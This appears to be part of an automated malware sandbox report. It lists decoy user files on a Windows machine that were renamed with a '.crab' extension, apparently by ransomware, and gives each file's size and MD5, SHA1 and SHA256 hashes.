SHA256: a81fa7fe7c9f592e62d138675a3c4adb1d21baeac377d4b13de3819e572f7a35
False
c:\users\5p5nrgjn0js halpmcxz\desktop\o_gts4saygj44bbl3b.ppt.crab 52.20 KB MD5: e17b4c9e185d3cd3a7e5fb67c81f5f6e
SHA1: 17017d1368e09a13e045524279f7928411f07cad
SHA256: bced775fa025ed1bb23502464aed9524eaf06c1e415276c807cf3585739b6c00
False
c:\users\5p5nrgjn0js halpmcxz\desktop\sna1cp_x5vrh0koe2o.wav.crab 38.13 KB MD5: d7ccff5ad029e322d4c0e44e628eaf5a
SHA1: 7ba5a72a8439c0836e59b4668872585c67750726
SHA256: f1b5bba680a5f0b19b8ead2b4474ae12aa21bca8874ebba0dd4ccbf86c610e46
False
c:\users\5p5nrgjn0js halpmcxz\desktop\suyp le7zwo.png.crab 89.21 KB MD5: 74a8b44ff3f9fccddc366ba5ed45d607
SHA1: c045040e2936394b601656b482e9a623ed0194a5
SHA256: 8caea7b8053320ba022fbf552fcbdf1a5350ec87ae288516a401b91c63f412f9
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\-evkchbwaa ah5px9a.avi.crab 24.88 KB MD5: 18cd6da36b9978f490e5836d9d234eae
SHA1: c88ea0518f96bd9d769d6a2ae713a55878a9c666
SHA256: 225b5fa75645a9b7f8b83a452e931eda22891132183440222499d670fedef5bf
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\1bgyxvbpc_4cgvbfg.png.crab 26.90 KB MD5: bafd4bb7a159a6f19f5fcedbe4431e20
SHA1: 23ae9eb7c092bbe41c09ad8504821751ab332211
SHA256: 1160a02eee52f4f2679eb76a5251cf733d8e9cf5fe53868236bc6c6c508eaf6a
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\32m30.bmp.crab 73.80 KB MD5: 7e1164757e53647db598704ae691b300
SHA1: c5fa52f14f6f9162d8fb016048551df5733b6af7
SHA256: e8482c48191d8d9be0aef1f1f12cd877b67e9941c212072ca84abf463c533453
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\0wavlt8vpgr2jbgu.ppt.crab 51.93 KB MD5: a16f38b38081b3d4be489e26cefd0bcf
SHA1: da0716a47141b959dd391065ad49ed3743897d95
SHA256: 3e22e00a0a8f1439da48ea9ec4605c347906d43ad25ad35c014cae8df0af8e7f
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\01usbj7r2oeb.wav.crab 4.35 KB MD5: db111b16bd1bf78d9426a27249e4b493
SHA1: bf9198a5d7a47459be5e46da9114f704277e1f7c
SHA256: b927e4ced407514cae95b4f076d47cb8e2c87f7a654f6678dc87f8b6b65b14bb
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\2fdm3on9h ksbc0l.mp3.crab 94.05 KB MD5: c19c7cc90f198eaa869a5e11ece64b88
SHA1: 8bbd1b0e3d36380c086d73bab2db3013bf89c0e0
SHA256: c53335dccf58be1c3370fbef4e5fac1cbc9c7dc94c6d118fdb319fd4c4e11d7b
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\bzmy gp0ity92fsqhbq.mp3.crab 100.27 KB MD5: 7f3bcf10738d215e7fc003ca8be0981c
SHA1: ce5f7a1ada133631c3e821f29310467b10dfd145
SHA256: 87cf704e9843d5bb761210bb2b000045642af5dfe56102ee8694409708096167
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\dmek.mp3.crab 48.27 KB MD5: e512a1ffbcc6774895a662e9bda7baa7
SHA1: 0971df1609ae4c1d50e3524775b8df42bba7d88b
SHA256: 1b8f0b0b7374750972e3032bc09a2315ddc7e3f794f527b71e2a720b6f8d94e5
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\j7faoue roabtzjqdfd.swf.crab 15.38 KB MD5: 26c99e3aa2ca4f46edcaf86182449fb0
SHA1: ce0cc3fafadb0b9cb4835f6fe55a21020ad335db
SHA256: 17cb29041f4a9545d9fc1e3ebdeea395210d04fae9042ba80e2eb417a85cc9a5
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\m4y2c7g2tk.jpg.crab 21.63 KB MD5: 2aaeba296464c00a8bea1af8b279c2d6
SHA1: c0bb5324de017eb55e7716777a240984084c8120
SHA256: b679c3769ef553d1b573ff4a6775598a5400f9e47f666369703d9c6d3652c639
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\mhaxw.rtf.crab 22.18 KB MD5: 93d3b812c964d6e730adec663a2baff6
SHA1: 7e8872c0502802d4f5e9c95ead6a3f268c0babf6
SHA256: 75c13a257803770fd6a4ff930027417edc0cffcc13605711aae631695c1fceef
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\pspuia.avi.crab 70.48 KB MD5: fde4d9403732565fcc6e4c2074c01ace
SHA1: 7071056cc02946001ab0241107398fc8b773e213
SHA256: ced541b6a7d05a82604efbbf7fa8046340e5ff7ad6a6beb62f83ff1918019dd7
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\py36c35uyq5zx0u1gb\sxwohppo3.doc.crab 66.01 KB MD5: 5cc47c7efc387efb27bf2ecb6275c082
SHA1: bf211294af0a07012be6afa3f5b6f5aea71d3995
SHA256: 401a6a062417e952aaa91dd7638f7f85c383e961b7294c0842ee022ab0df174e
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\9o5pum0skr0vpqawoif\py36c35uyq5zx0u1gb\wm6k-ajlw u.m4a.crab 33.59 KB MD5: ef7417aa757f947afa9d93ae5b3b5ada
SHA1: 7dd2fe0ba97006a2637e8643bc275391139c85fe
SHA256: 687730d7cdf6b8698644e6a2ae7df9358add784cc053623e8a919b9c118eedbe
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\m3gpl.flv.crab 41.07 KB MD5: b2e405983605a438a0fb0324b0b84819
SHA1: 1dc7f998fa080289fac7155845d89f0c8078da67
SHA256: 2790602de0d5d8adaba548626cf0152b35976351ab94db9e57b37303872c0f03
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\t7hdtapyyd0hqpg.bmp.crab 43.20 KB MD5: 9880d03f0e09d93218cf1f706e3d2826
SHA1: 53b9f4deb606dbfbd779f5eeece3702ed013a252
SHA256: b70796e4e590cf846ed64ea9446da29788c39bf7c24144638450bf925ddd0ab4
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\szfzfgtq8necac\yl6kbnr3.jpg.crab 69.23 KB MD5: 1c8c6e45301279b5edd5dafd4287eab8
SHA1: 3f773f3b3c38307a9b41c7d7093f778c151855ce
SHA256: 3dc9d4c35b55cd2801fbf14897142c0bf47038d4d02b12dc478acbd88efc2845
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\vcn7fm0cbrihld5htd.mp3.crab 35.87 KB MD5: a65318f5f7b6a902fdd5b20b762324bf
SHA1: 7733190007291e310c6cc694abda3e2e0df407b0
SHA256: 432e3634e0019e363600dec650f5819e9f40f47b83c073b4c5dde712c56db73f
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\ycqn-kjr58.png.crab 6.32 KB MD5: ef2cb7d116c3a741cfd3511e1dafca60
SHA1: 57cde78f8341c1f350cb1776338d82817cc304e4
SHA256: 0a30ce4a9430b62756caac26049ae87f72f2dad4d7b7a76d885cf81dfe7e4297
False
c:\users\5p5nrgjn0js halpmcxz\desktop\uyrs 3lrpz\z85gdm.avi.crab 56.43 KB MD5: 3e837f6710a2195d323be09faf4b0272
SHA1: 7a845da8fed2e54294042f454b5ed23609c22dd8
SHA256: e2507713d269319c76f75161b80740a9419a5534b1ed39e14c6e8fcc48fb42e4
False
c:\users\5p5nrgjn0js halpmcxz\desktop\v6c7.pps.crab 37.68 KB MD5: 69f1732d2beca729df9f08b6ab8e2ef7
SHA1: aeff7eea181b69cdf8e955622ee55a5e480a45d4
SHA256: 437abbb534bf94eda3412d24e679e791d25578329ddde9ebf3431e21b0b4beb5
False
c:\users\5p5nrgjn0js halpmcxz\desktop\ycxwj_xcsqcty.mkv.crab 72.07 KB MD5: f44d0d0cceb6261f22a192d3282d9ef1
SHA1: 4556a52c96bb5d7e6b77dd1a2303d873f8660444
SHA256: de4c6dfd8cacf6797b2d33e5a00e531eb0292d8d866f07b68418ccc3fdd4e735
False
c:\users\5p5nrgjn0js halpmcxz\desktop\ypqfu8fn86pqtfh.xls.crab 91.04 KB MD5: 12af27790f63d5c9f0636a300ff6d4b3
SHA1: bd1de8943b235d6ff4035b28596d6cad88a94054
SHA256: a44104299f3d917ada1a50ee04d8c8f6343ce8d0757dc4bdd36b038ccfe3eec9
False
c:\users\5p5nrgjn0js halpmcxz\documents\0gkv1dhq--sfc.pptx.crab 63.41 KB MD5: b811835e328a349cccbf6511aa136abb
SHA1: 9f02ff9d28e620db6f1aeb6ed63ec0b5047dd47c
SHA256: c50245d2cc9bf518772330a1d83de653f2c18f0d64e38a41ac491295d4edae95
False
c:\users\5p5nrgjn0js halpmcxz\documents\2grkyglwmfbx8bxs.pptx.crab 16.13 KB MD5: aea31d3df33edb8a56a20aec83b07444
SHA1: 70ed4b7decec406a8d019c23d57081d8f8e187f9
SHA256: 98cbdd11a95d7574eb0e39ce42003b095bb0d30a2ac0b84226e73c2c25a551e8
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\csimiqnt4h4m5egeyn.pps.crab 18.13 KB MD5: a48090ece91b5f8b21357e11c282c3b9
SHA1: 725e176f82adb922d030319630f127cf9346cd27
SHA256: 03940ddd0f72f08c5c794969604d4de52e69c89db48f98efffa964671e0ada30
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\dl53 rufencelqjpha1.xls.crab 25.66 KB MD5: 2897841233d45b7de690ff0391d644f3
SHA1: 82f03a17853084295039696305e36a13691cd812
SHA256: 9d5eb3e0ce1611d05ed48e863f71eb8b66f35b78f33fff75599ae848774add22
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\guwi54.pps.crab 92.79 KB MD5: 05f15a288b961e14d8e44708a5e94dfc
SHA1: ce228045d38e691a3e0a50b3a502ec50fc6273e2
SHA256: 0732edc06487e6901eb62d6367418540398d7308fefda411253a7c73cad785f8
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\hvru3w6x.ots.crab 27.48 KB MD5: e4fab7bb2588febd008fb3b1641d8d3b
SHA1: a2c34ea1ce98d6a19dbd37a29df4d32f7301c82e
SHA256: 90bc0abb229037faa7b6a2198d6f316d55fd466ecfa65e2896b5092d272abfe6
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\izqshubpdmhyey2.docx.crab 14.34 KB MD5: 2c64393ab97ed7e974e321d45e5e2309
SHA1: fadbf8d1c680f7309ba0fbce0991c5e0678b16d7
SHA256: 70c767bc4744770465a37b196951f88fb2138fb4ba2123868871e0f0c341ed8d
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\ktdfywbzd0oru.csv.crab 67.48 KB MD5: 744946a67be2581e5761cc090e6adc62
SHA1: 5cbe50930218bd9fe6f91f15adeccd8291e58ed3
SHA256: 02471cab7fb803067c3a453fc083f643029fdfa51a86233bb46d389043c664bb
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\lhddh1jrajhxs.xlsx.crab 12.43 KB MD5: 393687c22bb8471cbd6396f3000ebbcf
SHA1: 2018b2561bd5e126b5be9b81dc5caf11a00602da
SHA256: 3691e6cf37129fe0f4df2122d94ec2932c6c25896cf95ea3ef14bf3880177041
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\s9id_ 50w.rtf.crab 4.76 KB MD5: 0409f9aa776d78d60834cc52b30e2420
SHA1: 1d7837f438533f4188eb97e55bf5230c8991fb0d
SHA256: 2dd13f1375952b5d402b18413928bdd6028798f9730c69579fe6ffc876f10a52
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\tt-1g8nvj5xns.pdf.crab 60.60 KB MD5: 9422e94e4a284b27563ae40f9b0717e6
SHA1: 8cccddf521a7f71e0978a9268594cf0b1fdd51b6
SHA256: 4daed66af4c3b8ee5330286c47cfa2ed0d9b745686663dad38f092e127a23177
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\uj08nvk0w_jynzb8.odp.crab 100.35 KB MD5: fbecdd956edd46126c0540a28ee38631
SHA1: a37974c91b4247667702f1c5bddada2c9538246b
SHA256: b2611698dbdaed69bf4963534018e82d9bfea2a39cf5948ba245258b146e80fd
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\wewiuh vdfy.xls.crab 15.21 KB MD5: 5ab7ba399991e9d0009872e4bbaf752d
SHA1: ed3eb88080c76719aad706215676077691bfc34c
SHA256: 0743627e079ebc399791848f53a305782a3bbc97ef710121e6c1c7504f0cc423
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\y4odff7.xlsx.crab 92.62 KB MD5: 4f5930282d19d7c32c0d9d28e6c3c6f8
SHA1: 5fa3ed3de888b41e9826e015a426e16b40cc4a81
SHA256: fdd463e39818de399f9ec395a457c19483a9cdd4950e747802bf80d8313dde3a
False
c:\users\5p5nrgjn0js halpmcxz\documents\5a6dq a\_nppgasy8u1jujb1x.pps.crab 59.32 KB MD5: 4669937e22ebb74ae3a008197bdfde5f
SHA1: 8201dd2284a881b08715ea70eef74220eb3aa1cf
SHA256: 70156bb5c3de43aa0093c6bc9025d2f8999706728f5693cdc69ecc1793bf3b30
False
c:\users\5p5nrgjn0js halpmcxz\documents\5yrzp-_t-8vc13a.docx.crab 23.13 KB MD5: 76ece31140dbd5c2f8f246e1a9058556
SHA1: 1c700923968abde871ac5a6622e5c531f8fc0675
SHA256: 63b98b6c2d42daa4cd84362e56a0d38db26a1667d0d68407250b569c89018f75
False
c:\users\5p5nrgjn0js halpmcxz\documents\64a-qqwrbcez.rtf.crab 74.60 KB MD5: 2d6131880ed7e2e0a0b7da5c1c3bc945
SHA1: 4a87ebffcf86d33372de1c5d112f06d9ba9d3bd1
SHA256: 1f29df740bc66e269a03f9eadf23cde5d680e86cce7390d7c7860a32cb7fe25b
False
c:\users\5p5nrgjn0js halpmcxz\documents\6h2yb.pps.crab 36.65 KB MD5: 4262b5762258cebf22207f82df3d4995
SHA1: ab5c25d0b89cbfe40885d6220174d2b933acbb5a
SHA256: 2509d08c3fc7abfe3fd48dda9d5705b6da1dbdbd012e1aaa0f62a63eec9adf82
False
c:\users\5p5nrgjn0js halpmcxz\documents\7fq eekut2bggq.pptx.crab 7.96 KB MD5: 2fff348db71aea2710655642ea2a12b6
SHA1: be2e39a8196ecef36a1127cc052094f6f8512c6c
SHA256: b930ef82616d6a46807ea023e4a1407ee66887406d20179f35a0bca1c3b35641
False
c:\users\5p5nrgjn0js halpmcxz\documents\bfem.pptx.crab 6.93 KB MD5: 570152768d383674edcb98a2a11f3ba0
SHA1: e26549530c3c800a6bd4f57df4a6b1f405f6e985
SHA256: b4c129b5346529a3dfbbd258bdee03389715d9824dccb0809165315a889f6005
False
c:\users\5p5nrgjn0js halpmcxz\documents\ddjgm6r nlh_d8br.pptx.crab 20.66 KB MD5: 2966700a85de55bd53206afcac17f2ae
SHA1: a61294faa98964327645b9d5170e1d9d7ba9206e
SHA256: 5a46e87d9b3a783d9c9a07969bd8f92ae085b3bd7160d1f91b60b6bfe431eef5
False
c:\users\5p5nrgjn0js halpmcxz\documents\e5x1ge th5bpcjtu7z.ots.crab 78.48 KB MD5: 0f72cfa859e467824cb90b5e4e4819af
SHA1: 02dce9b053055ee6c10f962f9f331b606ae29f8a
SHA256: f8f0ada68e61202334e8f2e6b7d63ce61d99b3910f3fb590af80c3abeb97d939
False
c:\users\5p5nrgjn0js halpmcxz\documents\egjh7f0.docx.crab 11.88 KB MD5: 1d45e32c90b50301887e0e4d4df35e3d
SHA1: b094d13392f181935f9708807409addad2118cdc
SHA256: 819a445aaa730e0b392e94c595da19769473401de72b784a7f90a931cfd69383
False
c:\users\5p5nrgjn0js halpmcxz\documents\h2imtdkweqxira.xlsx.crab 42.40 KB MD5: c8981708190ab0065b711d0cc4d484ad
SHA1: 0d7ab674d6bd1f48d415d6d058dc32425fc5ab98
SHA256: 7e4e620a5abb287d33796c646161f1375c0084d93b76d32a82004dad8471233d
False
c:\users\5p5nrgjn0js halpmcxz\documents\hfywbyqcgq3jjxuir.pptx.crab 77.77 KB MD5: ed5c921c72303202356b7e1deac4e224
SHA1: 5536923dde0545aff9543207e7b4cfc7f4ce81ec
SHA256: 0ff2940b62e18d50b52808a8d09ef73e97f86927847a32a83bbb123bdc377155
False
c:\users\5p5nrgjn0js halpmcxz\documents\hsb-lx7qebqomaorr.xlsx.crab 57.62 KB MD5: 59e89094266ab41ceba3b7d461c5683c
SHA1: 702d89a747216767ee29f785d2baa8de82510607
SHA256: 8a59af3f45f11336a8b0b19ad55e22e4083cd9fd1211d24d1fca212a7487ec5d
False
c:\users\5p5nrgjn0js halpmcxz\documents\hzl97ecgfd.ppt.crab 26.71 KB MD5: b0ce4d4e5d78aa13ce25c54ecba378d7
SHA1: 4099c26dae6384cc8dd4017da741349aafd94c7f
SHA256: 377a5a80a7b9a1469ec6e9ee414a9f92a907faf46964984eb7be79fd43452aff
False
c:\users\5p5nrgjn0js halpmcxz\documents\ikpa.docx.crab 42.70 KB MD5: d3d88e545cb4fc7f7011907583dae3d1
SHA1: 9143abdf800f457ad40062834ac10cb1ef6cd06f
SHA256: 2cda032159408fdc8a3c157f4b2b94acf469adfc31248e6417f1eab0b2480bcc
False
c:\users\5p5nrgjn0js halpmcxz\documents\jquame2z7ags3dwdx.docx.crab 25.12 KB MD5: 5d59675b34d6c2b2dca3b258af9f9958
SHA1: 6fe3065dd2960ec01e46d4e53c85b841cc872ec9
SHA256: 1259c5582e66cd6435fae2561b7e012287ad87f2345781fc1195e7d13ddbc14c
False
c:\users\5p5nrgjn0js halpmcxz\documents\kyva.xls.crab 40.15 KB MD5: eccbcc18208e3af0817a48ed6f387c9f
SHA1: 468b20743f22778eb383b97b01993a9eddd21228
SHA256: 91fcb8b7ee3bff894b0c42b55ae442de072d599465d5d6e3646230283bd363d2
False
c:\users\5p5nrgjn0js halpmcxz\documents\m2welu.ods.crab 90.02 KB MD5: 2f138efab5c24fd81038060b30d4dab0
SHA1: ef96bb4598074ceb52baf975776daaf17a2ba3ab
SHA256: 1d33600bfdc1c48eb6bee9fdd80f3bc54c3536e0661d375c6141eabfe976445f
False
c:\users\5p5nrgjn0js halpmcxz\documents\mnnkc4ezv3kkaqlc5.pdf.crab 32.18 KB MD5: 039039a16429a2ea0433a408d4457dd2
SHA1: ff7bc9b8193493329b411f9612f973d1c57d8621
SHA256: 8d88a510187e3643229619873660da48f3e1d19ed158128128d830cdfa2784d7
False
c:\users\5p5nrgjn0js halpmcxz\documents\ooqnxh.docx.crab 90.02 KB MD5: ac5b8f5d9e5b3a141d01836a260c8f02
SHA1: 3e523253fb7e88b9c483524925c09bad4203991c
SHA256: bff2ecd37cc9274b2a969908478cde614c0de741c6ba743bb505f658f4fc445d
False
c:\users\5p5nrgjn0js halpmcxz\documents\outlook files\voeimd@djhreuu.uhd.pst.crab 265.51 KB MD5: e2a852aa1a099739651515a383417010
SHA1: 012311656f92686bbb5ddc6557b4cce89a5509f3
SHA256: 921418671ccfb155b15314067161900a5f1617bb2e8e6b62ee3590a8316b233c
False
c:\users\5p5nrgjn0js halpmcxz\documents\pqukdig5hwchepsnn5c.pptx.crab 49.57 KB MD5: 2d7ddaad03ac673aa2be2f380da88fe6
SHA1: e38e7724eec4c58a90c98b0955540098f3b01c5b
SHA256: d0bc3123d78a401634f8e5c14f94435fa752082d41135c801e86522720a5b988
False
c:\users\5p5nrgjn0js halpmcxz\documents\qkujpgfvo.xlsx.crab 35.05 KB MD5: a5b2054819f61da8532f7b9f2c2d8b9d
SHA1: 5b5b58095a88332fa8f970fce5c49567711502bf
SHA256: 4697f9a237b76e6751d2c8439330f537996a64084d2befbf3cba78dc222f0fe4
False
c:\users\5p5nrgjn0js halpmcxz\documents\tspiz hta.xlsx.crab 76.62 KB MD5: 3e4e69fef0b9b626af0e8f3b48e7b53f
SHA1: aba9c441d47065a898514e62a9482b2600e3b9a9
SHA256: 3aac9957773b5dfd8ebe0eb97de3f318af246e6ec3828de4e68be744723fb188
False
c:\users\5p5nrgjn0js halpmcxz\documents\unax6z hpc tccedmvz.doc.crab 86.90 KB MD5: d49f19171b5223ecf331ea5e22638be3
SHA1: 75bc11b5c118e2befc0d81f212e8c16b2a3eff27
SHA256: c6046f392514551f83d78b871b06563821f0c230a92bc43daba81e4bf60de247
False
c:\users\5p5nrgjn0js halpmcxz\documents\uru0-t2xbyapqkbwd.docx.crab 32.05 KB MD5: 635a86e3893f7efa04d0f8e399690b36
SHA1: 193b470fdb0fe3e2a6dc271b70e3d54fb9961ef6
SHA256: 792b4242fc7d28481b689dcd8d1027a1784f73f615ca9bab484bf9831caafcdd
False
c:\users\5p5nrgjn0js halpmcxz\documents\uyttnj6-zu6hymxza65.ppt.crab 66.12 KB MD5: ede4ff72d94a33c73949aa4093ca4bbd
SHA1: cc2f4f1cf4612e9b066655dc09be73def1052861
SHA256: 698caed4f9076edf369ccbafc29e2658b9e4efebfb657049cb507fdfd081b0c5
False
c:\users\5p5nrgjn0js halpmcxz\documents\v6h3h_iapu1agsb0w0h.pptx.crab 74.55 KB MD5: 0b7974610e823a632f65baaf2f03f96f
SHA1: 61cef91a2b9374bfc3b7ed280724d493bc69d17e
SHA256: 12658163a7be47e89f4153c76289b9bb2d67cdcc6c3e36bff1a56db7c4b29f9c
False
c:\users\5p5nrgjn0js halpmcxz\documents\w5hg0qrpyh w4vse.pdf.crab 64.68 KB MD5: 8cfc4c1b546b0045b58f929f4dc21a86
SHA1: 90001f324ebc477a72d3a14fefa85b2145452415
SHA256: 3ac423a7392c828ab0dfa2654df8f5a17cb47c46d456bea353a08a716dc3a71f
False
c:\users\5p5nrgjn0js halpmcxz\documents\wkwrjuo.xlsx.crab 64.66 KB MD5: e7cd2528d50880ea56613a29d3d82d58
SHA1: 4b3420803ac001627c44141115026558b9808193
SHA256: 271fafc269faea4d581b3c28442bb3316a237d1e8c2a637520b059b8d422942e
False
c:\users\5p5nrgjn0js halpmcxz\documents\yg1v.pdf.crab 25.43 KB MD5: 21e650e4cdf4199ce1b18a9032b21002
SHA1: 38d5375c819fabaf5d5abf5b925fce3c58c8d852
SHA256: e8856f4167f7325ce2682d7ec6e46cb5e65255704cd90d1dbada1198d920db97
False
c:\users\5p5nrgjn0js halpmcxz\documents\yyfj.pdf.crab 12.52 KB MD5: 0f83aff5c2bd1f594987906725c6a7ef
SHA1: 7c743d2a827ad1eb8021dd3da8c5d85bfd22cb21
SHA256: dae72d163fe3d2fac9e3a4f2a16b4b26fb624a5a9c9924492a61961674184cad
False
c:\users\5p5nrgjn0js halpmcxz\documents\z3kydmxlfnpzasweja.pptx.crab 82.95 KB MD5: b5f1ae76ad88ae8b36b38c5a784b3db3
SHA1: 814a19b210a9c7ff568c26ad4f3d0239f46cdc15
SHA256: c2f546c89d3e349dd22c033ff396c7ec1ffa6f12c05f0a03ed734a0f6ec47c0c
False
c:\users\5p5nrgjn0js halpmcxz\documents\zpay87jqinf3n.pptx.crab 46.98 KB MD5: 60c8a62602bd4697554dd188847b952a
SHA1: 22dda5787da07051da46169509e4ff19e389f6e0
SHA256: 252e75b5922d6cdea3113d70e0b802f3184e23991013d7ad6db92ef44de7c13f
False
c:\users\5p5nrgjn0js halpmcxz\documents\_gwqvkno.pdf.crab 58.79 KB MD5: e813acdc8b592c9234c2fbda49b9d98b
SHA1: 4e3dd264481a6a68c9148456f8a928945c8ef79a
SHA256: a4300eb3a62c5d0d222066d5e52d31fa7d7cb92f08617926d628d58c094b8288
False
c:\users\5p5nrgjn0js halpmcxz\favorites\links\suggested sites.url.crab 0.74 KB MD5: 301f3acc4308629d7a6c7c50b7065c3d
SHA1: 1c248e237ba60473815716aee09d4a23a9726af4
SHA256: b1476f09edf3184e85a8783d08e0e33aed39e92731b0d0e0b22a745c4c9716ef
False
c:\users\5p5nrgjn0js halpmcxz\favorites\links\web slice gallery.url.crab 0.74 KB MD5: f5645d34cb9b02595c39f4314e156ff1
SHA1: 226e474f4973a9281e4bb0a5475520857ba320b6
SHA256: 5a96ac3c89798111c8e434832877585f07c3e78f94cdf8397da7ff4f11689c21
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\ie add-on site.url.crab 0.65 KB MD5: 9934323991d0949e2b512ea158c9f93c
SHA1: e3e016fa5d73d6cde6d63408452fefdf38cbc047
SHA256: ce99f02d5cad0810ab59dc246751d5f4f499a7373cdeb71c70ed0e0a34ce8ad1
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\ie site on microsoft.com.url.crab 0.65 KB MD5: b451da65a965d83e8ab9067b30d2ba24
SHA1: cc10dd8f0f6e59917259c015f9f5be1f361fe513
SHA256: 2ab3c151d195ab10d8a20194a9b1670fec950577b30b97b5d26bc1e9e7426465
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\microsoft at home.url.crab 0.65 KB MD5: 0d534fa7d0f805ef1fbd5425b6a2480d
SHA1: 6225e7c6a1065ca377da5ed34a59f6aeecee3bfc
SHA256: 9bdef12ff8fb96c3ef7aa758f413f42aa04f1505953f8b9fe628f78b1835e426
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\microsoft at work.url.crab 0.65 KB MD5: 3361640ac1145799e366b97c0c0c04b4
SHA1: 6e6b814626dae94e730086aaba6117026cbacc60
SHA256: 91f2c327436bb1e516ba359aba62bad674023469ed996c67f5cf80a5162cdfa3
False
c:\users\5p5nrgjn0js halpmcxz\favorites\microsoft websites\microsoft store.url.crab 0.65 KB MD5: 60600725423c5442537b438fab460c26
SHA1: e90536dff8cbf85f97626c93b9550b4a3aa4ee8c
SHA256: 8ded43b4012dbc99e9c256814fc8c7e5f19629b9753c06f429679cc856ffedd6
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msn autos.url.crab 0.65 KB MD5: 85ba3ef395a509df3d1f2489aaf0b327
SHA1: 550dcfef6bddef57438c1115aedcaa23bac609f7
SHA256: f9b2b32a35862f1cc440bd9cd1434483198093fe0385b86ec6901584b23e406d
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msn entertainment.url.crab 0.65 KB MD5: b8be4fc25103760e94dbd3c4a1f245f4
SHA1: e6b69263bf6949e7a808c8fc1c3b72e4bfe558f1
SHA256: 862c5682511a26923ae907720c2f38d1c184ef9c1b4a5510d65a860482a525c1
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msn money.url.crab 0.65 KB MD5: c10b87c9a113dba797009c0466fa26e4
SHA1: 3a2d4424c6b55ac9332f8420dd45076c02454fa8
SHA256: 694a95b52a3639836845d47799f4530628ba7cfb748c5c603da4d4ba7b06ac1b
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msn sports.url.crab 0.65 KB MD5: 08da66ffb46d1f508c533cd7a5f910ef
SHA1: 7108161590b9eba59047e87af8f2b7ab21e29062
SHA256: 2081495c4b18a322e76c848c74d96f8d6669db8558f8ce9de52e368cc2a9b490
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msn.url.crab 0.65 KB MD5: c9579c3c9710b0c27c2c7d95ec5e60bc
SHA1: 6f139a29465cf9e25b3075a60b85c8df022c3b85
SHA256: d0c7b5980b43305653433a45eaed2fda346ab7dfb9f7bf941ae2668b4351bc04
False
c:\users\5p5nrgjn0js halpmcxz\favorites\msn websites\msnbc news.url.crab 0.65 KB MD5: dd17d3506082649c9988be030b064103
SHA1: d18bf9cc6a67104088bbba4dde797de0e581b8d4
SHA256: 732258f0f7ca8a0e07a0d686e7ced2137666b1b6d89bbeb36472894df607e977
False
c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\get windows live.url.crab 0.65 KB MD5: b8a409b8164ff097f6169777e96c4a04
SHA1: 9c8ce2f29e72b00d0c0b2ba81c8565cfab47df0f
SHA256: d8f64af169c3e98cedc4c876d3247c583a2b2334dd47484118e5245de31d2f01
False
c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\windows live gallery.url.crab 0.65 KB MD5: bf690c857f7116267c3d17f156b31e61
SHA1: 73e1a2c8ae657d5b26aaf5f2cd24640fd0e11407
SHA256: fc9b860e6598f67a8778a76f015d4b2d403e8f99ab8c93809db653c605bc6445
False
c:\users\5p5nrgjn0js halpmcxz\favorites\windows live\windows live mail.url.crab 0.65 KB MD5: bb107b712333143f7335f5cf4611fbfb
SHA1: 8fbdf409e173e6008cf9b29ce2290f8a08b64b76
SHA256: 2b3cd76d549afcbbe1405ec30c835c0c6b9acc4ad244d497b4aab509541486b8
False
